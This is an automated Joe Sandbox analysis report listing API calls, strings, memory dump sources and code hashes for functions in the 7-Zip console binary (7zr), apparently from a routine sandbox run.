                                          Control-flow Graph: function at 00CA6359 (rendered graph with executed / not executed block shading omitted)
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA635E
                                          • fputs.MSVCRT ref: 00CA645F
                                            • Part of subcall function 00CAC7D7: fputs.MSVCRT ref: 00CAC840
                                          • fputs.MSVCRT ref: 00CA6547
                                          • fputs.MSVCRT ref: 00CA665F
                                          • fputs.MSVCRT ref: 00CA66AE
                                            • Part of subcall function 00C71F91: fflush.MSVCRT ref: 00C71F93
                                            • Part of subcall function 00C71FB3: __EH_prolog.LIBCMT ref: 00C71FB8
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog$fflushfree
                                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                          • API String ID: 1750297421-1898165966
                                          • Opcode ID: e40bc3a24a0d7892f836da7b4fa83c8449776e9ba2e23caf67780abfd9b81e59
                                          • Instruction ID: cdbca8b33a7b39b4b6b61486aca74075850d6220982691ad815d5ce58cce4720
                                          • Opcode Fuzzy Hash: e40bc3a24a0d7892f836da7b4fa83c8449776e9ba2e23caf67780abfd9b81e59
                                          • Instruction Fuzzy Hash: 88B13F306017069FDB24EFA4C995BAAB7F1FF45308F08852DE96A97291CB70AD44DF50

                                          Control-flow Graph: function at 00C76C72 (rendered graph with executed / not executed block shading omitted)
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C76C77
                                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00C76EC9
                                            • Part of subcall function 00C76C72: wcscmp.MSVCRT ref: 00C770A5
                                            • Part of subcall function 00C76BF5: __EH_prolog.LIBCMT ref: 00C76BFA
                                            • Part of subcall function 00C76BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00C76C1A
                                            • Part of subcall function 00C76BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00C76C49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                          • String ID: :$DATA
                                          • API String ID: 3316598575-2587938151
                                          • Opcode ID: a6c6193370cb36d7e6040bfaf1b778c1d55c18c3c167211cbf5f85ce988ac8bf
                                          • Instruction ID: f074fee1fdf111c533dc7e921bbbf066656aeb6fa37a0c059b1e69e62fc802d1
                                          • Opcode Fuzzy Hash: a6c6193370cb36d7e6040bfaf1b778c1d55c18c3c167211cbf5f85ce988ac8bf
                                          • Instruction Fuzzy Hash: F8E124309006099BCF25EFA5C895BEEB7B1FF14314F10C619E86E672D2DB70AA49DB11
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog
                                          • String ID: =
                                          • API String ID: 2614055831-2525689732
                                          • Opcode ID: 4e242703edbcdfbae7d5544d0fb550f7d1f60ba97f0475cca79ebbd28507ad1c
                                          • Instruction ID: a1879ee05753bb9f831296854bb70b0371f4e27c161aa941c2575509d6b5aa62
                                          • Opcode Fuzzy Hash: 4e242703edbcdfbae7d5544d0fb550f7d1f60ba97f0475cca79ebbd28507ad1c
                                          • Instruction Fuzzy Hash: 12219032904109EFCF09EB94E946BEDBBB5EF48314F24402AF805721A1DF711E45EBA0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA8346
                                          • fputs.MSVCRT ref: 00CA835B
                                          • fputs.MSVCRT ref: 00CA8364
                                            • Part of subcall function 00CA83BF: __EH_prolog.LIBCMT ref: 00CA83C4
                                            • Part of subcall function 00CA83BF: fputs.MSVCRT ref: 00CA8401
                                            • Part of subcall function 00CA83BF: fputs.MSVCRT ref: 00CA8437
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog
                                          • String ID: =
                                          • API String ID: 2614055831-2525689732
                                          • Opcode ID: d14bf6b15080d6d3785b2bde837039c1c53c2bb0c90f930c73d79284d0672173
                                          • Instruction ID: d9bdcb3b892c8589ebf4ef848c5142fcdc21a0a018dc747915f84bff2961d7f2
                                          • Opcode Fuzzy Hash: d14bf6b15080d6d3785b2bde837039c1c53c2bb0c90f930c73d79284d0672173
                                          • Instruction Fuzzy Hash: 3701D631A00009ABCF16BBA8D812AEDBF75EF84714F00801AF845922A1CF744A95EBE1
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C9209B
                                            • Part of subcall function 00C7757D: GetLastError.KERNEL32(00C7D14C), ref: 00C7757D
                                            • Part of subcall function 00C92C6C: __EH_prolog.LIBCMT ref: 00C92C71
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLastfree
                                          • String ID: Cannot find archive file$The item is a directory
                                          • API String ID: 683690243-1569138187
                                          • Opcode ID: c7df96b419209afb23e5356326e86144f72dd4067b5e6d36da126128e6bfe1f6
                                          • Instruction ID: 9b8d073137fd0a9b09d0a2ca97dd7821454124edf5da2f37e6858f2d0d5bc005
                                          • Opcode Fuzzy Hash: c7df96b419209afb23e5356326e86144f72dd4067b5e6d36da126128e6bfe1f6
                                          • Instruction Fuzzy Hash: 69723871D00258EFCF25DFA8C888BDDBBB5AF59304F14809AE899A7252C7709E81DF51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: CountTickfputs
                                          • String ID: .
                                          • API String ID: 290905099-4150638102
                                          • Opcode ID: a22fe14f33f6a0126120296d975ae384e02160a07c3036bd3bcdcf290fe5ba0f
                                          • Instruction ID: f7678a182fdc83e98c001a6e42d2ba1a33f6080473f39452104bccd23d44bf5a
                                          • Opcode Fuzzy Hash: a22fe14f33f6a0126120296d975ae384e02160a07c3036bd3bcdcf290fe5ba0f
                                          • Instruction Fuzzy Hash: 3A713C31600B059FCB25EF74C5D1AAAB7F6BF82708F00881DE49B97681DB71BA45DB21
                                          APIs
                                            • Part of subcall function 00C79C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00C79CB3
                                            • Part of subcall function 00C79C8F: GetProcAddress.KERNEL32(00000000), ref: 00C79CBA
                                            • Part of subcall function 00C79C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00C79CC8
                                          • __aulldiv.LIBCMT ref: 00CB093F
                                          • __aulldiv.LIBCMT ref: 00CB094B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                          • String ID: 3333
                                          • API String ID: 3520896023-2924271548
                                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                          • Instruction ID: 94158a5f7afc0ed5a9b2d2a5e48632779e3a33ddc885f4330a316653a7de6bd4
                                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                          • Instruction Fuzzy Hash: 382153B1D007046EE7309F6A8881B5FBAF9FB84750F24892EB18AD7642D670A9448B75
                                          APIs
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          • memset.MSVCRT ref: 00C9AEBA
                                          • memset.MSVCRT ref: 00C9AECD
                                            • Part of subcall function 00CB04D2: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00CB04F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: memset$ExceptionThrowfree
                                          • String ID: Split
                                          • API String ID: 1404239998-1882502421
                                          • Opcode ID: 1b2807890b2a10bc2c33c7c31a40371414f9f3ba67d8c1813a8f08d945b31ab3
                                          • Instruction ID: e98b38e8304c51ba148d75335b6822fcbe25a71e9ea8baf22f0e2cb9f5edf659
                                          • Opcode Fuzzy Hash: 1b2807890b2a10bc2c33c7c31a40371414f9f3ba67d8c1813a8f08d945b31ab3
                                          • Instruction Fuzzy Hash: 32425D30A00258DFDF25DFA9C988BEDBBB1BF45304F244099E859A7251CB31AE85DF52
                                          APIs
                                          • fputs.MSVCRT ref: 00CA8437
                                          • fputs.MSVCRT ref: 00CA8401
                                            • Part of subcall function 00C71FB3: __EH_prolog.LIBCMT ref: 00C71FB8
                                          • __EH_prolog.LIBCMT ref: 00CA83C4
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prologfputs$fputc
                                          • String ID:
                                          • API String ID: 678540050-0
                                          • Opcode ID: e67733a6b8e2c41a1036640d1f6cfb1a7278c36afb09f05cf35dcadefe549e7f
                                          • Instruction ID: 383f1073d0d1214c270e2530201d8ea6c8bad58b1acb7f5b0a96981a6ff1feca
                                          • Opcode Fuzzy Hash: e67733a6b8e2c41a1036640d1f6cfb1a7278c36afb09f05cf35dcadefe549e7f
                                          • Instruction Fuzzy Hash: 5F11E931F041055BCF09BBF8D813AAEBFB5EF45750F004029F905932D1CF655945AAE4
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C92CE0
                                            • Part of subcall function 00C75E10: __EH_prolog.LIBCMT ref: 00C75E15
                                            • Part of subcall function 00C841EC: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00C8421A
                                            • Part of subcall function 00C7965D: VariantClear.OLEAUT32(?), ref: 00C7967F
                                          Strings
                                          • Cannot create output directory, xrefs: 00C93070
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ClearExceptionThrowVariant
                                          • String ID: Cannot create output directory
                                          • API String ID: 814188403-1181934277
                                          • Opcode ID: 295528a13cb18e6984240841d6fd20fd9de471b37c0eb26b9a000916e6801de6
                                          • Instruction ID: 13288b3a487f5e0d6f7b9535e45c648bf90aa94b24ea8d3592cf2688066afa78
                                          • Opcode Fuzzy Hash: 295528a13cb18e6984240841d6fd20fd9de471b37c0eb26b9a000916e6801de6
                                          • Instruction Fuzzy Hash: F7F1B230901289EFCF25EFA4C898AEDBBB5BF19304F14409DE49967252DB309F49DB51
                                          APIs
                                          • fputs.MSVCRT ref: 00CAC840
                                            • Part of subcall function 00C725CB: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00C725ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionThrowfputs
                                          • String ID:
                                          • API String ID: 1334390793-399585960
                                          • Opcode ID: 8fd45f0d4f6d48394846772749f415ae76cb77fe7dcf4f9517a61fcf89ce742a
                                          • Instruction ID: d1faea3e48d3015f5750a34856cfd76452d8e6c8c891b12d648bae8e2ee53f32
                                          • Opcode Fuzzy Hash: 8fd45f0d4f6d48394846772749f415ae76cb77fe7dcf4f9517a61fcf89ce742a
                                          • Instruction Fuzzy Hash: 2511B271604745AFDB15CF58C8C1BAABBE6FF46308F04846EE156CB291C7B5B944C760
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs
                                          • String ID: Open
                                          • API String ID: 1795875747-71445658
                                          • Opcode ID: 21b2841620f87274f5eb66478a96b804d066c43f0bd00f3b4478211753456464
                                          • Instruction ID: e6ae2bab351c77dab9cb2b2c93dd91af1e697306a3df992c7dd67bbf3eb56586
                                          • Opcode Fuzzy Hash: 21b2841620f87274f5eb66478a96b804d066c43f0bd00f3b4478211753456464
                                          • Instruction Fuzzy Hash: B311AC32505704AFC720EF78E991ADABBE5FF15314F44C82EE5AA83212DB31A944CF60
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CC06B3
                                          • _CxxThrowException.MSVCRT(?,00D2D480), ref: 00CC08F2
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionThrow$H_prologmalloc
                                          • String ID:
                                          • API String ID: 3044594480-0
                                          • Opcode ID: 7c2c1c56fb832f5211cd2f573fd9362f9bc6721fb7f9fa0fdaca7e5f356f73df
                                          • Instruction ID: a21cb6e925b5b2558a3d1e70f6b94250ebae9bc46c40acf48d2baeb815e8cf05
                                          • Opcode Fuzzy Hash: 7c2c1c56fb832f5211cd2f573fd9362f9bc6721fb7f9fa0fdaca7e5f356f73df
                                          • Instruction Fuzzy Hash: 11913B70900249DFCF21DFA9C881EEEBBB5AF09304F248199E859A7292C7306E45DF61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 18d550a81acc8ff2b72c8674e50c25688c2a8b3bb6b7bded599a0c594102911d
                                          • Instruction ID: e8034e55f9a418e0c3996d2463e15f4c9be5a2f7ca4890733ea35a9438b27eb0
                                          • Opcode Fuzzy Hash: 18d550a81acc8ff2b72c8674e50c25688c2a8b3bb6b7bded599a0c594102911d
                                          • Instruction Fuzzy Hash: 74F1F070500785DFCF21EF64C490AAABBF1BF14308F58486EE4AA8B211D730EE84CB59
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C84255
                                            • Part of subcall function 00C8440B: __EH_prolog.LIBCMT ref: 00C84410
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ExceptionThrowmalloc
                                          • String ID:
                                          • API String ID: 3744649731-0
                                          • Opcode ID: eac575d2dbfb94923662283e47e57b76a38072d5e33e7cc17562a48de68739e8
                                          • Instruction ID: 41e3f047b19e81f97b95724f4f5e39f7196baa91712e30ee92cd9d88a33b7336
                                          • Opcode Fuzzy Hash: eac575d2dbfb94923662283e47e57b76a38072d5e33e7cc17562a48de68739e8
                                          • Instruction Fuzzy Hash: 0751C3B0801B88DFC325DF69D1846CAFBF0BF19304F5488AEC49A97752D7B4A648DB61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 0743a76fcd0e951926c5b6f8c32511bb43ffeebf2cbde70de5bfd13b68a22fcc
                                          • Instruction ID: f7a1b90549af6a301c6c688c02c96eebe38547dd4dec827542f1a5fe6330cb11
                                          • Opcode Fuzzy Hash: 0743a76fcd0e951926c5b6f8c32511bb43ffeebf2cbde70de5bfd13b68a22fcc
                                          • Instruction Fuzzy Hash: 9431F7B4D00609EFCF14EF95D8958AEBBB5FF94364B20811EF82A67251C7309E51DBA0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C9021F
                                            • Part of subcall function 00C83D66: __EH_prolog.LIBCMT ref: 00C83D6B
                                            • Part of subcall function 00C83D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83D7D
                                            • Part of subcall function 00C83D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83D94
                                            • Part of subcall function 00C83D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00C83DB6
                                            • Part of subcall function 00C83D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83DCB
                                            • Part of subcall function 00C83D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83DD5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID:
                                          • API String ID: 1532160333-0
                                          • Opcode ID: 0f1eb9d4285e39a0308dbcae475774c0d804da536ddd8d32e1f99158e45fc679
                                          • Instruction ID: e82656d604f8f39f2927bb8d3ceaf75a37ee919ccc1f21a67891b8541a6614d0
                                          • Opcode Fuzzy Hash: 0f1eb9d4285e39a0308dbcae475774c0d804da536ddd8d32e1f99158e45fc679
                                          • Instruction Fuzzy Hash: FC2139B1946B90CFC321CF6A82D0686FFF4BB19604B94996EC0DA83B12C774A548CF65
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CAC0B8
                                            • Part of subcall function 00C97193: __EH_prolog.LIBCMT ref: 00C97198
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$free
                                          • String ID:
                                          • API String ID: 2654054672-0
                                          • Opcode ID: a20713e3c942372d9abb723cd7272d27f7809feb87c008d9321f4808749e2827
                                          • Instruction ID: daa985920e4c0998799ac09a3e069eb83de1e43447e1dbed37f38ce1a98fbc52
                                          • Opcode Fuzzy Hash: a20713e3c942372d9abb723cd7272d27f7809feb87c008d9321f4808749e2827
                                          • Instruction Fuzzy Hash: AEF0E972900312DBD7269F4AE8817AEF3B9EF65764F10412FF82597711CFB19D5086A0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CB0364
                                            • Part of subcall function 00CB01C4: __EH_prolog.LIBCMT ref: 00CB01C9
                                            • Part of subcall function 00CB0143: __EH_prolog.LIBCMT ref: 00CB0148
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                            • Part of subcall function 00CB03D8: __EH_prolog.LIBCMT ref: 00CB03DD
                                            • Part of subcall function 00CB004A: __EH_prolog.LIBCMT ref: 00CB004F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                           • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmp
                                           • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmp
